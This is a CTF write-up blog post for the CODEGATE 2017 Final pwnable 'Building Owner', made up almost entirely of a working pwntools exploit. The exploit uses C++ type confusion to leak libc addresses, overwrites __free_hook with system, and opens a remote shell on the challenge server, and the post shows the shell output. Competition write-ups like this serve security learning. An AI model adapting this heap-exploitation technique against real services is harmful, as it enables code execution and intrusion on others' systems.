CTF/2017

CODEGATE 2017 FINAL - Building Owner

pwn3r_45 2017. 6. 4. 03:39

Category : Pwnables 


owner


Summary : type confusion, c++, free heap



Exploit

#!/usr/bin/python


from pwn import *

from struct import pack, unpack

p = lambda x : pack("<Q", x)

up = lambda x : unpack("<Q", x)[0]

HOST = 'cykor.kr'

PORT = 7979


def create_apart(s, name, floor, house, desc):

s.sendline('1')

s.recvuntil('> ')

s.recvuntil('? \n')

s.sendline(name)

s.recvuntil('? ')

s.sendline(str(floor))

s.recvuntil('? ')

s.sendline(str(house))

s.recvuntil(': ')

s.sendline(desc)



def m(s, menu):

s.sendline(str(menu))

s.recvuntil('> ')



s = remote(HOST, PORT)

create_apart(s, 'pwn3r', 45, 45, 'pwn3r') # apart1

create_apart(s, 'pwn4r', 45, 45, 'pwn4r') # apart2

#create_apart(s, 'pwn5r', 45, 45, 'pwn5r') # apart3


m(s, 4) # manage

m(s, 2) # manage - change buliding

m(s, 1) # type - apartment

m(s, 1) # from apart1

m(s, 2) # to restaurant

m(s, 4) # back (now manage)


m(s, 1) # manage - edit

m(s, 1) # type - apartment

m(s, 1) # apart2

m(s, 1) # 1. name

s.recvuntil('Enter new name : ')

s.sendline('B'*0x70)

m(s, 5) # back (now edit)


# memory leak

m(s, 3)    # type - restaurant

m(s, 1)    # apart1

s.recvuntil('Normal price of menu : ')

leaked = int(s.recvline())

print hex(leaked)

main_arena_ptr = leaked - 0x90

m(s, 6) # 6. Normal price of menu

s.sendline(str(main_arena_ptr))

m(s, 9) # back (now edit)

m(s, 1) # type - apartment

m(s, 1) # apart2

s.recvuntil('Name : ')

main_arena = up(s.recvline()[:8]) - 88

libc = ELF('/lib/x86_64-linux-gnu/libc-2.24.so')

libc_base = main_arena -0x3c1b00#libc.symbols['main_arena']


#libc.symbols['main_arena'] = main_arena

free_hook = libc_base +libc.symbols['__free_hook']

system_libc = libc_base + libc.symbols['system']

m(s, 5) # back (now edit)

m(s, 3) # type - restaurant

m(s, 1) # apart1

m(s, 6) # 6. Normal price of menu

s.sendline(str(free_hook))

m(s, 9) # back (now edit)

m(s, 1) # type - aprtment

m(s, 1) # apart2

m(s, 1) # name edit

s.recvuntil('Enter new name : ')

s.sendline(p(system_libc))

m(s, 5) # back (now edit)

m(s, 3) # type - restaurant

m(s, 1) # apart1

m(s, 6) # 6. Normal price of menu

s.sendline(str(up('/bin/sh\x00')))

m(s, 9) # back (now edit)

m(s, 4) # back (now manage)

m(s, 4) # back (now home)

m(s, 5) # exit


s.interactive()


"""

pwn3r@cykor-ubuntu:~$ python owner_ex.py

[+] Opening connection to cykor.kr on port 7979: Done

0x55c0908f8e50

[*] '/lib/x86_64-linux-gnu/libc-2.24.so'

    Arch:     amd64-64-little

    RELRO:    Partial RELRO

    Stack:    Canary found

    NX:       NX enabled

    PIE:      PIE enabled

[*] Switching to interactive mode

$ id

uid=1011(pwn3r) gid=1011(pwn3r) groups=1011(pwn3r)

""" 


저작자표시 (새창열림)